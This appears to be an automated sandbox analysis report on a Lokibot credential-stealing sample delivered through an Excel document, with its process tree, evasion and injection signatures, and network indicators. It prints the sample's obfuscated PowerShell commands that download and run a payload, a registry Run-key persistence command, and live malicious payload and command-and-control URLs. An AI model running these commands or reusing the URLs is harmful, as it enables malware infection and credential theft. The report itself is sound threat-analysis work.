Source: C:\Users\user\ntrwe.exe TID: 2500 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\ntrwe.exe TID: 1776 Thread sleep count: 185 > 30
Source: C:\Users\user\ntrwe.exe TID: 2784 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 17_2_00403D74
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: 12.exe, 0000000B.00000003.2176518302.00000000082B9000.00000004.00000001.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_0040317B mov eax, dword ptr fs:[00000030h] 17_2_0040317B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_00402B7C GetProcessHeap,RtlAllocateHeap, 17_2_00402B7C
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\12.exe Process token adjusted: Debug
Source: C:\Users\user\ntrwe.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\12.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\ntrwe.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 protect: page execute and read and write
Bypasses PowerShell execution policy
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Injects a PE file into a foreign processes
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 401000
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 415000
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 41A000
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 4A0000
Source: C:\Users\user\ntrwe.exe Memory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 7EFDE008
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exe
Source: C:\Users\user\AppData\Local\Temp\12.exe Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
Source: C:\Users\user\AppData\Local\Temp\12.exe Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
Source: C:\Users\user\ntrwe.exe Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\12.exe Queries volume information: C:\Users\user\AppData\Local\Temp\12.exe VolumeInformation
Source: C:\Users\user\ntrwe.exe Queries volume information: C:\Users\user\ntrwe.exe VolumeInformation
Source: C:\Users\user\ntrwe.exe Queries volume information: C:\Users\user\ntrwe.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
Source: C:\Users\user\ntrwe.exe Queries volume information: C:\Users\user\ntrwe.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_00406069 GetUserNameW, 17_2_00406069
Source: C:\Users\user\AppData\Local\Temp\12.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match File source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 12.exe PID: 2800, type: MEMORY
Source: Yara match File source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: PopPassword 17_2_0040D069
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: SmtpPassword 17_2_0040D069
Yara detected Credential Stealer
Source: Yara match File source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2192, type: MEMORY
Source: Yara match File source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Behavior Graph (ID: 336301, Sample: 6Cprm97UTl, Startdate: 05/01/2021, Architecture: WINDOWS, Score: 100)

Top-level signatures shown on the graph: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 9 other signatures.

Process tree recovered from the graph (parent above child, with the files dropped, network endpoints and signatures attached to each node):

  • EXCEL.EXE (Obfuscated command line found; Document exploit detected (process start blacklist hit))
    • cmd.exe (Obfuscated command line found)
      • powershell.exe
        • 12.exe (dropped C:\Users\user\ntrwe.exe, PE32; Drops PE files to the user root directory; Hides that the sample has been downloaded from the Internet (zone.identifier))
          • ntrwe.exe (Machine Learning detection for dropped file; Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures)
            • RegAsm.exe (contacts 185.206.215.56 ports 49168, 49169, 49170, ON-LINE-DATAServerlocation-NetherlandsDrontenNL, Ukraine; Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file registry); Tries to steal Mail credentials (via file access); 2 other signatures)
          • cmd.exe
            • reg.exe
    • cmd.exe
      • powershell.exe (contacts bighoreca.nl 83.172.144.37 port 80, NEDZONE-ASNL, Netherlands and cutt.ly 104.22.0.232 port 443, CLOUDFLARENETUS, United States; dropped C:\Users\user\Documents\12.exe, PE32; Drops PE files to the document folder of the user; Powershell drops PE file)
      • RegAsm.exe
    • cmd.exe
      • powershell.exe
  • ntrwe.exe (dropped C:\Users\user\AppData\Local\Temp\RegAsm.exe, PE32; Writes to foreign memory regions; Allocates memory in foreign processes; Hides that the sample has been downloaded from the Internet (zone.identifier); Injects a PE file into a foreign processes)
  • ntrwe.exe

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
83.172.144.37 | unknown | Netherlands | 25459 | NEDZONE-ASNL | true
104.22.0.232 | unknown | United States | 13335 | CLOUDFLARENETUS | true
185.206.215.56 | unknown | Ukraine | 204601 | ON-LINE-DATAServerlocation-NetherlandsDrontenNL | true

Contacted Domains

Name | IP | Active
cutt.ly | 104.22.0.232 | true
bighoreca.nl | 83.172.144.37 | true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://bighoreca.nl/wp-content/themes/index/QPR-3067.exe | true | Avira URL Cloud: safe | unknown
http://185.206.215.56/morx/1/cgi.php | true | Avira URL Cloud: safe | unknown